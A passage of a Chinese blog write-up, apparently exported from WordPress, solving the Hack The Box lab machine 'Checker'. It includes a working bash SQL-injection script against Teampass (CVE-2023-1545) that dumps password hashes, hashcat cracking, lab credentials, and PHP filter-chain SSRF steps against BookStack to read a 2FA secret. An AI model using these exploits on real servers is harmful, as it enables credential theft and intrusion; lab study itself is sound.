{"id":225,"date":"2025-02-26T16:53:43","date_gmt":"2025-02-26T08:53:43","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=225"},"modified":"2026-01-29T16:16:16","modified_gmt":"2026-01-29T08:16:16","slug":"225","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/02\/26\/225\/","title":{"rendered":"HTB\u9776\u673a Checker \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.10.11.56<\/strong><\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.11.56 (10.10.11.56) 56(84) bytes of data.\n64 bytes from 10.10.11.56: icmp_seq=1 ttl=63 time=352 ms\n64 bytes from 10.10.11.56: icmp_seq=2 ttl=63 time=236 ms\n64 bytes from 10.10.11.56: icmp_seq=3 ttl=63 time=219 ms\n64 bytes from 10.10.11.56: icmp_seq=4 ttl=63 time=211 ms\n\n--- 10.10.11.56 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3002ms\nrtt min\/avg\/max\/mdev = 211.148\/254.477\/352.028\/57.008 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Feb 24 15:12:55 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN .\/fin_result.txt 10.10.11.56\nWarning: 10.10.11.56 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.56\nHost is up (0.21s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT     STATE         SERVICE\n22\/tcp   open|filtered ssh\n80\/tcp   open|filtered http\n8080\/tcp open|filtered http-proxy\n\n# Nmap done at Mon Feb 24 15:13:25 2025 -- 1 IP address (1 host up) scanned in 29.99 seconds<\/code><\/pre>\n<p>\u9776\u673a\u7591\u4f3c\u5f00\u653e\u4e86\u4ee5\u4e0b\u670d\u52a1\uff1a<code>ssh\/22<\/code>\u3001<code>80,8080\/http<\/code>\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><strong><code>TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Feb 24 15:15:31 2025 as: \/usr\/lib\/nmap\/nmap -sS -sV -A -p- --min-rate 3000 -oN .\/tcp_report.txt 10.10.11.56\nWarning: 10.10.11.56 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.56\nHost is up (0.20s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 aa:54:07:41:98:b8:11:b0:78:45:f1:ca:8c:5a:94:2e (ECDSA)\n|_  256 8f:2b:f3:22:1e:74:3b:ee:8b:40:17:6c:6c:b1:93:9c (ED25519)\n80\/tcp   open  http    Apache httpd\n|_http-server-header: Apache\n|_http-title: 403 Forbidden\n8080\/tcp open  http    Apache httpd\n|_http-server-header: Apache\n|_http-title: 403 Forbidden\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.19\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 554\/tcp)\nHOP RTT       ADDRESS\n1   215.44 ms 10.10.14.1\n2   215.71 ms 10.10.11.56\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Mon Feb 24 15:16:37 2025 -- 1 IP address (1 host up) scanned in 65.88 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Mon Feb 24 15:17:30 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN .\/udp_report.txt 10.10.11.56\nWarning: 10.10.11.56 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.56\nHost is up (0.24s latency).\nAll 65535 scanned ports on 10.10.11.56 are in ignored states.\nNot shown: 65315 open|filtered udp ports (no-response), 220 closed udp ports (port-unreach)\n\n# Nmap done at Mon Feb 24 15:21:35 2025 -- 1 IP address (1 host up) scanned in 244.35 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Ubuntu Linux<\/code>\uff0c\u6839\u636e<code>HackTheBox<\/code>\u9776\u673a\u63d0\u4ea4\u89c4\u5219\uff0c\u5f53\u524d\u9776\u673a\u4e3b\u57df\u540d\u5c06\u88ab\u8bbe\u7f6e\u4e3a<code>checker.htb<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n<p>\u7aef\u53e3<code>Banner<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/checker]\n\u2514\u2500# nc -nv 10.10.11.56 22                                        \n(UNKNOWN) [10.10.11.56] 22 (ssh) open\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10<\/code><\/pre>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/checker.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740449781715-6ef2ea9d-8f6f-4088-9040-72a899155134.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a<code>80<\/code>\u7aef\u53e3\u90e8\u7f72\u4e86<code>BookStack<\/code>\u4e2a\u4eba\u7b14\u8bb0\u7ba1\u7406\u7cfb\u7edf\u3002\u5c1d\u8bd5\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u9875\u9762\u5f15\u7528\u4e86\u7cfb\u7edf\u81ea\u8eab\u7684<code>CSS<\/code>\u6837\u5f0f<code>\/dist\/styles.css<\/code>\uff0c\u8fd8\u9644\u5e26\u4e86<code>version<\/code>\u53c2\u6570\uff0c\u5185\u5bb9\u4e3a<code>v23.10.2<\/code>\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;!-- Styles --&gt;\n&lt;link rel=\"stylesheet\" href=\"http:\/\/checker.htb\/dist\/styles.css?version=v23.10.2\"&gt;<\/code><\/pre>\n<p>\u63a8\u6d4b<code>BookStack<\/code>\u7cfb\u7edf\u7248\u672c\u4e3a<code>v23.10.2<\/code>\u3002\u5c1d\u8bd5\u8054\u7f51\u641c\u7d22\u6f0f\u6d1e\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740450503969-0541ea59-8acd-44e3-bc80-087afcac82a9.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0<code>BookStack v23.10.2<\/code>\u7cfb\u7edf\u5b58\u5728\u6388\u6743<code>SSRF<\/code>\u6f0f\u6d1e\uff08<code>CVE-2023-6199<\/code>\uff09\uff01\u8be5\u7cfb\u7edf\u540e\u53f0\u5728\u5904\u7406\u7b14\u8bb0\u63d0\u4ea4\u65f6\uff0c\u4f1a\u63d0\u53d6<code>HTTP POST<\/code>\u8bf7\u6c42\u53c2\u6570<code>HTML<\/code>\u4e2d\u7684<code>img<\/code>\u6807\u7b7e\uff0c\u5982\u679c<code>HTML<\/code>\u56fe\u7247\u6807\u7b7e\u4f7f\u7528<code>Base64<\/code>\u7f16\u7801\u56fe\u7247\u5185\u5bb9\u5e76\u5c06\u5176\u786c\u7f16\u7801\u5728\u6807\u7b7e\u5185\u90e8\uff0c\u5219\u540e\u53f0\u4f1a\u81ea\u52a8\u89e3\u7801\u5904\u7406<code>Base64<\/code>\u5b57\u7b26\u4e32\u3002\u4f46\u5982\u679c\u5f53<code>img<\/code>\u6807\u7b7e\u5185\u7684<code>Base64<\/code>\u503c\u4e3a<code>URL<\/code>\u65f6\uff0c\u540e\u53f0\u4f1a\u81ea\u884c\u8bbf\u95ee\u8be5<code>URL<\/code>\uff0c\u8fd9\u91cc\u4fbf\u9020\u6210\u4e86<code>SSRF<\/code>\u6f0f\u6d1e\u3002\u9664\u4e86\u4f7f\u7528<code>http<\/code>\u534f\u8bae\u8bbf\u95ee\u6307\u5b9a\u7f51\u9875\uff0c\u8fd8\u53ef\u4ee5\u4f7f\u7528<code>file:\/\/<\/code>\u534f\u8bae\u6765\u8bbf\u95ee\u670d\u52a1\u5668\u6587\u4ef6\u7cfb\u7edf\u3002<\/p>\n<p>\u94fe\u63a5\u5730\u5740\uff1a<a href=\"https:\/\/fluidattacks.com\/blog\/lfr-via-blind-ssrf-book-stack\/\" target=\"_blank\"  rel=\"nofollow\" >LFR via SSRF in BookStack | Blog | Fluid Attacks<\/a><\/p>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff088080\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u6253\u5f00\u7f51\u5740<code>http:\/\/checker.htb:8080<\/code>\uff0c\u67e5\u770b\u7f51\u7edc\u8bf7\u6c42\uff0c\u53d1\u73b0\u7f51\u9875\u5c1d\u8bd5\u52a0\u8f7d\u57df\u540d<code>vault.checker.htb<\/code>\u7684\u5185\u5bb9\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740451331296-4af59f21-a236-49fb-a4d3-b225f3f11f47.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u5728<code>hosts<\/code>\u6587\u4ef6\u5185\u6dfb\u52a0\u89e3\u6790\u8bb0\u5f55\uff0c\u968f\u540e\u8bbf\u95ee\u4e3b\u9875\uff1a<code>http:\/\/vault.checker.htb:8080<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740451407710-13a986bf-d5de-42b9-835c-5fed54a9f93c.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>8080<\/code>\u7aef\u53e3\u90e8\u7f72\u4e86<code>Teampass<\/code>\u5bc6\u7801\u7ba1\u7406\u7cfb\u7edf\u3002\u5c1d\u8bd5\u8054\u7f51\u641c\u7d22\u6f0f\u6d1e\uff0c\u53d1\u73b0\u8be5\u7cfb\u7edf<code>v3.0.10<\/code>\u4e4b\u524d\u7248\u672c\u5b58\u5728<code>SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\uff0c<code>CVE ID<\/code>\u4e3a<code>CVE-2023-1545<\/code>\uff1a<a href=\"https:\/\/security.snyk.io\/vuln\/SNYK-PHP-NILSTEAMPASSNETTEAMPASS-3367612\" target=\"_blank\"  rel=\"nofollow\" >SQL Injection in nilsteampassnet\/teampass | CVE-2023-1545 | Snyk<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740451935400-d01c191c-5b90-41e3-b633-6913f25a954d.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>Teampass SQL\u6ce8\u5165\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5728<code>8080<\/code>\u7aef\u53e3\u7684\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u53d1\u73b0<code>Teampass<\/code>\u5bc6\u7801\u7ba1\u7406\u7cfb\u7edf\u7591\u4f3c\u5b58\u5728<code>SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\u3002\u5c1d\u8bd5\u4f7f\u7528\u5982\u4e0b<code>EXP<\/code>\u8bfb\u53d6<code>Teampass<\/code>\u7cfb\u7edf\u7684\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<pre><code class=\"language-bash\">if [ \"$#\" -lt 1 ]; then\n  echo \"Usage: $0 &lt;base-url&gt;\"\n  exit 1\nfi\n\nvulnerable_url=\"$1\/api\/index.php\/authorize\"\n\ncheck=$(curl --silent \"$vulnerable_url\")\nif echo \"$check\" | grep -q \"API usage is not allowed\"; then\n  echo \"API feature is not enabled :-(\"\n  exit 1\nfi\n\n# htpasswd -bnBC 10 \"\" h4ck3d | tr -d ':n'\narbitrary_hash='$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx\/WxRA8\/tKvWdaWQ\/iDuKlIkMbhq'\n\nexec_sql() {\n  inject=\"none' UNION SELECT id, '$arbitrary_hash', ($1), private_key, personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' FROM teampass_users WHERE login='admin\"\n  data=\"{\"login\":\"\"$inject\"\",\"password\":\"h4ck3d\", \"apikey\": \"foo\"}\"\n  token=$(curl --silent --header \"Content-Type: application\/json\" -X POST --data \"$data\" \"$vulnerable_url\" | jq -r '.token')\n  echo $(echo $token| cut -d\".\" -f2 | base64 -d 2&gt;\/dev\/null | jq -r '.public_key')\n}\n\nusers=$(exec_sql \"SELECT COUNT(*) FROM teampass_users WHERE pw != ''\")\n\necho \"There are $users users in the system:\"\n\nfor i in `seq 0 $(($users-1))`; do\n  username=$(exec_sql \"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT $i,1\")\n  password=$(exec_sql \"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT $i,1\")\n  echo \"$username: $password\"\ndone<\/code><\/pre>\n<p>\u76f4\u63a5\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-shell\">.\/teampass_sqlexp.sh http:\/\/vault.checker.htb:8080<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740452463952-a8dc2726-39b2-4ace-b6f7-5c8a993fa445.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u7528\u6237\u54c8\u5e0c\u503c\uff01\u4e14\u54c8\u5e0c\u7c7b\u578b\u4e3a<code>BCrypt<\/code>\uff0c\u8fed\u4ee3\u6b21\u6570\u4e3a<code>10<\/code>\u6b21\u3002<\/p>\n<h2>\u7206\u7834Teampass\u7528\u6237\u54c8\u5e0c\u767b\u5f55<\/h2>\n<p>\u53d1\u73b0\u7528\u6237\u54c8\u5e0c\u4e4b\u540e\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>hashcat<\/code>\u8fdb\u884c\u7206\u7834\u3002\u9996\u5148\u7206\u7834<code>bob<\/code>\u7528\u6237\u7684\u54c8\u5e0c\uff1a<code>$2y$10$yMypIj1keU.VAqBI692f..XXn0vfyBL7C1EhOs35G59NxmtpJ\/tiy<\/code>\uff0c\u5b57\u5178\u4f7f\u7528<code>rockyou.txt<\/code>\uff1a<\/p>\n<pre><code class=\"language-powershell\">.\\hashcat.exe -m 3200 -a 0 \"`$2y`$10`$yMypIj1keU.VAqBI692f..XXn0vfyBL7C1EhOs35G59NxmtpJ\/tiy\" .rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740452800266-db5e05d2-06b8-4b84-a1dd-aa9f753b1973.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>bob<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>cheerleader<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u767b\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740452909718-0fb9d49b-e8f7-4ce6-8d57-339ba4ca58d4.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h2>\u767b\u5f55BookStack\u7b14\u8bb0\u7cfb\u7edf<\/h2>\n<p>\u6210\u529f\u767b\u5f55<code>Teampass<\/code>\u5bc6\u7801\u7ba1\u7406\u7cfb\u7edf\u540e\uff0c\u70b9\u51fb\u540e\u53f0\u53f3\u4fa7\u7684<code>bookstack login<\/code>\u9875\u9762\u94fe\u63a5\uff0c\u53d1\u73b0<code>BookStack<\/code>\u7684\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740453770128-63e6ceb1-8574-449f-bd40-c9fd38be62e7.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0<code>BookStack<\/code>\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7535\u5b50\u90ae\u7bb1\uff1a<code>bob@checker.htb<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>mYSeCr3T_w1kI_P4sSw0rD<\/code><\/li>\n<\/ul>\n<p>\u67e5\u770b\u4e0b\u4e00\u9879\u51ed\u636e<code>ssh access<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740454279701-5e30828f-990f-42cd-b18b-be3c93d57b4a.png\" alt=\"\" \/><\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>reader<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>hiccup-publicly-genesis<\/code><\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u767b\u5f55<code>SSH<\/code>\uff0c\u53d1\u73b0<code>SSH<\/code>\u670d\u52a1\u5728\u6210\u529f\u9a8c\u8bc1\u7cfb\u7edf\u8d26\u53f7\u51ed\u636e\u540e\uff0c\u8fd8\u8981\u6c42\u8f93\u5165\u53e6\u4e00\u4e2a\u9a8c\u8bc1\u7801\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740454493760-6e103c0e-4456-45b1-b702-d610ab7acc91.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u8054\u7f51\u67e5\u8be2\u76f8\u5173\u4fe1\u606f\uff0c\u53d1\u73b0\u8be5<code>SSH<\/code>\u670d\u52a1\u5b58\u5728\u53cc\u56e0\u7d20\u8ba4\u8bc1\u673a\u5236\u3002\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u5b89\u88c5\u4e86<code>Google<\/code>\u52a8\u6001\u9a8c\u8bc1\u7801\u9274\u6743<code>PAM<\/code>\u63d2\u4ef6\uff0c\u5f53\u7528\u6237\u9700\u8981\u4ece<code>SSH<\/code>\u767b\u5f55\u65f6\uff0c\u9664\u4e86\u8f93\u5165\u6b63\u786e\u7684\u5bc6\u7801\u5916\uff0c\u8fd8\u5fc5\u987b\u8f93\u5165\u7531<code>Google PAM<\/code>\u63d2\u4ef6\u751f\u6210\uff0c\u5411\u4e91\u9a8c\u8bc1\u7801\u670d\u52a1\u540c\u6b65\u7684<code>6<\/code>\u4f4d\u6570\u5728\u7ebf\u9a8c\u8bc1\u7801\uff0c\u4e14\u8be5\u9a8c\u8bc1\u7801\u7684\u6709\u6548\u671f\u53ea\u6709<code>30<\/code>\u79d2\u3002\u7528\u4e8e\u751f\u6210\u52a8\u6001\u9a8c\u8bc1\u7801\u7684\u5bc6\u94a5\u4f4d\u4e8e\u7528\u6237\u5bb6\u76ee\u5f55\u7684<code>.google_authenticator<\/code>\u914d\u7f6e\u6587\u4ef6\u5185\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740454957477-0fc74388-6afc-4829-a931-ba195b7d12ab.png\" alt=\"\" \/><\/p>\n<p>\u65e2\u7136\u6682\u65f6\u65e0\u6cd5\u767b\u5f55<code>SSH<\/code>\uff0c\u90a3\u4e48\u53ea\u80fd\u767b\u5f55<code>BookStack<\/code>\uff0c\u5c1d\u8bd5\u5bfb\u627e\u5176\u5b83\u4fe1\u606f\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740455144242-abb0594b-2d1e-45be-9191-0fafbeddd3a1.png\" alt=\"\" \/><\/p>\n<p>\u70b9\u51fb\u7b14\u8bb0<code>Basic Backup with cp<\/code>\uff0c\u5728\u7b14\u8bb0\u5185\u53d1\u73b0\u4e86\u4e00\u4e9b\u5907\u4efd\u811a\u672c\u6e90\u4ee3\u7801\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740455271254-d8c7196d-42f1-4944-a74c-87577b51c167.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\nSOURCE=\"\/home\"\nDESTINATION=\"\/backup\/home_backup\"\n\nmkdir -p $DESTINATION\ncp -r --remove-destination -p $SOURCE $DESTINATION\/<\/code><\/pre>\n<p>\u8fd9\u610f\u5473\u7740\uff0c\u9776\u673a\u7cfb\u7edf\u7528\u6237<code>reader<\/code>\u7684\u5bb6\u76ee\u5f55\u53ef\u80fd\u88ab\u5907\u4efd\u81f3\u4e86\u76ee\u5f55<code>\/backup\/home_backup<\/code>\u4e0b\uff0c\u800c\u5728\u4e00\u822c\u60c5\u51b5\u4e2d\uff0c<code>.google_authenticator<\/code>\u52a8\u6001\u9a8c\u8bc1\u7801\u914d\u7f6e\u6587\u4ef6\u5728\u6307\u5b9a\u7528\u6237\u5bb6\u76ee\u5f55\u5185\uff0c\u5219\u8be5\u914d\u7f6e\u6587\u4ef6\u5f88\u53ef\u80fd\u4e5f\u88ab\u590d\u5236\u5230\u4e86\u5907\u4efd\u76ee\u5f55\u4e0b\u3002<\/p>\n<p>\u7ed3\u5408<code>BookStack v23.10.2<\/code>\u7248\u672c\u5b58\u5728<code>SSRF<\/code>\u6f0f\u6d1e\uff0c\u5e76\u53ef\u4ee5\u901a\u8fc7<code>file:\/\/<\/code>\u534f\u8bae\u8bfb\u53d6\u670d\u52a1\u5668\u672c\u5730\u6587\u4ef6\u7684\u60c5\u51b5\uff0c\u51b3\u5b9a\u5229\u7528\u8be5\u6f0f\u6d1e\u8bfb\u53d6<code>\/backup\/home_backup\/reader\/.google_authenticator<\/code>\u6587\u4ef6\uff0c\u83b7\u53d6\u52a8\u6001\u9a8c\u8bc1\u7801\u751f\u6210\u5bc6\u94a5\u540e\uff0c\u4f7f\u7528\u5728\u7ebf\u5de5\u5177\u9884\u6d4b\u5f53\u524d\u65f6\u95f4\u300130\u79d2\u524d\u548c30\u79d2\u540e\u7684\u9a8c\u8bc1\u7801\uff0c\u5e76\u9010\u4e2a\u5c1d\u8bd5\u8fdb\u884c<code>SSH<\/code>\u767b\u5f55\u3002<\/p>\n<h2>BookStack SSRF\u6f0f\u6d1e\u8bfb\u53d6\u914d\u7f6e\u6587\u4ef6<\/h2>\n<p>\u767b\u5f55<code>BookStack<\/code>\u540e\uff0c\u6839\u636e\u4e4b\u524d\u8054\u7f51\u641c\u7d22\u5230\u7684\u6f0f\u6d1e\u5229\u7528\u89c6\u9891\u8fdb\u884c\u6f0f\u6d1e\u590d\u73b0\u3002\u9996\u5148\u70b9\u51fb<strong>\u4e3b\u9875\u53f3\u4e0a\u89d2<code>Books<\/code> =&gt; \u53f3\u4fa7\u8fb9\u680f<code>Create a Book<\/code>\u6309\u94ae<\/strong>\uff0c\u8fdb\u5165\u4e66\u7c4d\u521b\u5efa\u9875\u9762\u968f\u4fbf\u8f93\u5165\u4e00\u4e2a\u4e66\u540d\u540e\uff0c\u70b9\u51fb<code>Save Book<\/code>\u521b\u5efa\u65b0\u7535\u5b50\u4e66\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740464617570-7cd863a9-6c52-4235-b180-f3da408953cc.png\" alt=\"\" \/><\/p>\n<p>\u521b\u5efa\u5b8c\u6bd5\u540e\uff0c\u70b9\u51fb\u65b0\u7535\u5b50\u4e66\u7ba1\u7406\u9875\u9762\u4e0a\u7684<code>Create a new page<\/code>\u6309\u94ae\uff0c\u5728\u6807\u9898\u680f\u548c\u9875\u9762\u4e0a\u968f\u4fbf\u8f93\u5165\u4e00\u4e9b\u5185\u5bb9\u540e\uff0c\u6253\u5f00<code>BurpSuite<\/code>\u62e6\u622a<code>BookStack<\/code>\u524d\u7aef\u53d1\u51fa\u7684\u81ea\u52a8\u4fdd\u5b58\u5185\u5bb9\u8bf7\u6c42\u5305\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740464923023-4ffe9dc1-81a9-410f-821b-d7d151e72563.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740465179764-6c79707a-1ebd-431a-9696-188329333103.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>AJAX<\/code>\u8bf7\u6c42\u7684\u76ee\u6807<code>URL<\/code>\u4e3a<code>\/ajax\/page\/8\/save-draft<\/code>\u3002\u6839\u636e<code>EXP<\/code>\u53d1\u5e03\u8005\u7684\u89c6\u9891\uff0c\u51b3\u5b9a\u4f7f\u7528\u5982\u4e0b\u5de5\u5177\u53d1\u9001\u6076\u610f<code>AJAX<\/code>\u6570\u636e\u5305\uff1a<a href=\"https:\/\/github.com\/synacktiv\/php_filter_chains_oracle_exploit\" target=\"_blank\"  rel=\"nofollow\" >synacktiv\/php_filter_chains_oracle_exploit: A CLI to exploit parameters vulnerable to PHP filter chain error based oracle.<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740544498864-61b2d11b-5d96-4e9a-bd4b-4be08874bde1.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-shell\">git clone https:\/\/github.com\/synacktiv\/php_filter_chains_oracle_exploit.git<\/code><\/pre>\n<p>\u6210\u529f\u4e0b\u8f7d\u9879\u76ee\u540e\uff0c\u9996\u5148\u7f16\u8f91<code>.\/filters_chain_oracle\/core\/requestor.py<\/code>\uff0c\u627e\u5230\u7ec4\u88c5<code>php:\/\/filter<\/code>\u94fe\u7684\u4ee3\u7801\uff0c\u6dfb\u52a0\u5c06\u7ec4\u88c5\u7684<code>PHP Filter<\/code>\u8bfb\u94fe\u8fdb\u884c<code>Base64<\/code>\u7f16\u7801\u540e\uff0c\u62fc\u63a5\u5230<code>HTML img<\/code>\u6807\u7b7e\u5185\u7684\u4ee3\u7801\uff1a<\/p>\n<pre><code class=\"language-python\">base64_chain = base64.b64encode(f'php:\/\/filter\/{s}{self.in_chain}\/resource={self.file_to_leak}'.encode()).decode()\nfilter_chain = f'&lt;img src=\"data:image\/png;base64,{base64_chain}\"&gt;'<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1740544810948-7b1dd68e-43c7-4308-91dd-d9f78861e536.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u53d1\u9001\u5e26\u6709\u653b\u51fb\u4ee3\u7801\u7684<code>AJAX<\/code>\u8bf7\u6c42\u5305\uff0c\u8bfb\u53d6<code>Google 2FA<\/code>\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">.\/filters_chain_oracle_exploit.py --target \"http:\/\/checker.htb\/ajax\/page\/8\/save-draft\" --file \/backup\/home_backup\/home\/reader\/.google_authenticator --verb PUT --parameter html --proxy http:\/\/127.0.0.1:8080 --headers '{\"X-CSRF-TOKEN\":\"hlx3zCjAuwynlc9tWQIyKMqAgp8CrInPVdgf7sfg\", 